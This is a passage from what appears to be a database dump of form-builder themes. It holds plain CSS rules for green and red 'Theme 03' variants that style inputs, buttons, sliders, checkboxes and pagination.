cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}',0),(9,'Theme 03 green','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EEEF;\r\nborder: 1px solid #3A620A;\r\nmargin-bottom: 10px;\r\ncolor: #3A620A;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 0px;\r\n	border: 1px solid #39680B;\r\n	background: #C9FD9C;\r\n	height: 13px;\r\n	width: 13px;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -5px !important;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover {\r\n	background: #4A8C08!important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active {\r\n	background: #4A8C08!important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus {\r\n	background: #4A8C08!important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover {\r\n	background: #4A8C08!important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active {\r\n	background: #4A8C08!important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus {\r\n	background: #4A8C08!important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #4A8C08!important;\r\n	color: #fff;\r\n}\r\n.ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #C9FD9C !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/03/01/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 32px;\r\n	height: 25px;\r\n	background: url([SITE_ROOT]/images/03/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #414141;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background-color: #ACABAB;\r\npadding: 2px 15px;\r\nvertical-align: middle;\r\nborder: none;\r\nfont-size: 15px;\r\n}\r\n\r\n\r\n.button-submit {\r\n	background: #3A620A;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #fff;\r\n	border: 2px solid #4A8C08;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 1px 1px #44740E;\r\n	font-family: Segoe UI;\r\n	}\r\n.button-reset {\r\n	background: #D8D6D7;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 2px solid #fff;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px 1px #969495;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_page {\r\n	background: #CDD9C3;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/03/01/bg.png);\r\n	text-align: left;\r\n	padding: 10px 20px 10px 50px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: right;\r\n	color: #000;\r\nfont-size: 18px;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 15px;\r\ntext-align: left;\r\nfont-size: 18px;\r\ncolor: #555;\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n	padding: 0px 15px;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	padding: 2px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n	background-color: #DFDFDF;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #fff;\r\n	background-color: #42810e;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	background-color: #36690c;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 33px;\r\n	text-align: center;\r\n	font-size: 21px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-bottom: -13px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 20px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #62983A; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #61b217 0%, #62983a 39%, #62983a 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #61b217), color-stop(39%, #62983a), color-stop(100%, #62983a)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #61b217 0%, #62983a 39%, #62983a 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #61b217 0%, #62983a 39%, #62983a 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #61b217 0%, #62983a 39%, #62983a 100%); /* IE10+ */\r\n	background: linear-gradient(to right, #61b217 0%, #62983a 39%, #62983a 100%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #DFDFDF;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px -34px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 12px;\r\nline-height: 18px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 34px;\r\n	height: 18px;\r\n	background: url([SITE_ROOT]/images/03/01/percentage_arrow.png);\r\n	position: relative;\r\n	left: -1px;\r\ntop:0px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',0),(10,'Theme 03 red','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EEEF;\r\nborder: 1px solid #811919;\r\nmargin-bottom: 10px;\r\ncolor: #811919;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 0px;\r\n	border: 1px solid #39680B;\r\n	background: #C9FD9C;\r\n	height: 13px;\r\n	width: 13px;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -5px !important;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover {\r\n	background: #5D0000 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active {\r\n	background: #5D0000 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus {\r\n	background: #5D0000 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover {\r\n	background: #5D0000 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active {\r\n	background: #5D0000 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus {\r\n	background: #5D0000 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #5D0000 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #942323 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/03/02/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 32px;\r\n	height: 25px;\r\n	background: url([SITE_ROOT]/images/03/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #414141;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background-color: #ACABAB;\r\npadding: 2px 15px;\r\nvertical-align: middle;\r\nborder: none;\r\nfont-size: 15px;\r\n}\r\n\r\n.button-submit {\r\nbackground: #811919;\r\ncursor: pointer;\r\nfont-size: 17px;\r\nmin-width: 80px;\r\nmin-height: 34px;\r\ncolor: #fff;\r\nborder: 2px solid #9E1919;\r\nmargin: 5px;\r\nbox-shadow: 0px 0px 1px 1px #811818;\r\nfont-family: Segoe UI;\r\n	}\r\n.button-reset {\r\n	background: #D8D6D7;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 2px solid #fff;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px 1px #969495;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_page {\r\n	background: #F0EEEF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/03/02/bg.png);\r\n	text-align: left;\r\n	padding: 10px 20px 10px 50px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: right;\r\n	color: #fff;\r\nfont-size: 18px;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 15px;\r\ntext-align: left;\r\ncolor: #555;\r\nfont-size: 18px;\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n	padding: 0px 15px;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	padding: 2px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 